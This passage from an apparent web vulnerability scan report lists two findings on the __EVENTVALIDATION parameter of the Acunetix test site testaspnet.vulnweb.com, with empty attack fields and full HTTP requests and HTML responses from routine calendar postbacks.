site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8262&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAzhhRftoIZGRkE%2Fg9jiJGHmlpHdeDxi8ekwU50xU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLz7K6bAQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268D2LsGppjY7TuPpKmH%2FRS5Zax5xuE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:20:45 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAzhhRftoIZGRkE/g9jiJGHmlpHdeDxi8ekwU50xU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLz7K6bAQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268D2LsGppjY7TuPpKmH/RS5Zax5xuE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:White" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1139 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,139 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8533&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAwf5EU9sIZGRkL9fHLsmPHmtS1CUNfNAtOu1jRDM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLzz5wXAtCn5uMHAqrO1NAFAo332KgDAo332KgDAo33zM8MAo33zM8MAo334OIFAo334OIFAo33lLkNAo33lLkNAo33iNwGAo33iNwGAo33vPMPAo33vPMPAo330JcHAo330JcHAo33xCoCjffEKgKN97iSDQKN97iSDQKN96ypBgKN96ypBgLmnb%2FeCQLmnb%2FeCQLmndPyAgLmndPyAgLmnceJCgLmnceJCgLmnfusAwLmnfusAwLmne%2FDDALmne%2FDDALmnYPmBQLmnYPmBQLmnbe9DQLmnbe9DQLmnavQBgLmnavQBgLmnZ%2B5AwLmnZ%2B5AwLmnbPcDALmnbPcDAL7pJ3FDwL7pJ3FDwL7pLGYBwL7pLGYBwL7pKU%2FAvukpT8C%2B6TZ0wkC%2B6TZ0wkC%2B6TN9gIC%2B6TN9gIC%2B6ThjQoC%2B6ThjQoC%2B6SVoAMC%2B6SVoAMC%2B6SJxwwC%2B6SJxwwC%2B6T9rAkC%2B6T9rAkC%2B6SRwwIC%2B6SRwwIC3Mvj6AUC3Mvj6AUC3MuXjw0C3MuXjw0C3MuLogYC3MuLogYC3Mu%2F%2BQ8C3Mu%2F%2BQ8C3MvTnQcC3MvTnQcC3MvHMALcy8cwAtzL%2B9cJAtzL%2B9cJAtzL7%2BoCAtzL7%2BoCAtzLw9MPAtzLw9MPAtzL9%2FYIAtzL9%2FYIArHSwZ8KArHSwZ8KArHS9bIDArHS9bIDDFLKRf2THN%2F80lukyZrxq5clpfo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:28:16 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAwf5EU9sIZGRkL9fHLsmPHmtS1CUNfNAtOu1jRDM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLzz5wXAtCn5uMHAqrO1NAFAo332KgDAo332KgDAo33zM8MAo33zM8MAo334OIFAo334OIFAo33lLkNAo33lLkNAo33iNwGAo33iNwGAo33vPMPAo33vPMPAo330JcHAo330JcHAo33xCoCjffEKgKN97iSDQKN97iSDQKN96ypBgKN96ypBgLmnb/eCQLmnb/eCQLmndPyAgLmndPyAgLmnceJCgLmnceJCgLmnfusAwLmnfusAwLmne/DDALmne/DDALmnYPmBQLmnYPmBQLmnbe9DQLmnbe9DQLmnavQBgLmnavQBgLmnZ+5AwLmnZ+5AwLmnbPcDALmnbPcDAL7pJ3FDwL7pJ3FDwL7pLGYBwL7pLGYBwL7pKU/AvukpT8C+6TZ0wkC+6TZ0wkC+6TN9gIC+6TN9gIC+6ThjQoC+6ThjQoC+6SVoAMC+6SVoAMC+6SJxwwC+6SJxwwC+6T9rAkC+6T9rAkC+6SRwwIC+6SRwwIC3Mvj6AUC3Mvj6AUC3MuXjw0C3MuXjw0C3MuLogYC3MuLogYC3Mu/+Q8C3Mu/+Q8C3MvTnQcC3MvTnQcC3MvHMALcy8cwAtzL+9cJAtzL+9cJAtzL7+oCAtzL7+oCAtzLw9MPAtzLw9MPAtzL9/YIAtzL9/YIArHSwZ8KArHSwZ8KArHS9bIDArHS9bIDDFLKRf2THN/80lukyZrxq5clpfo=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:White" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who 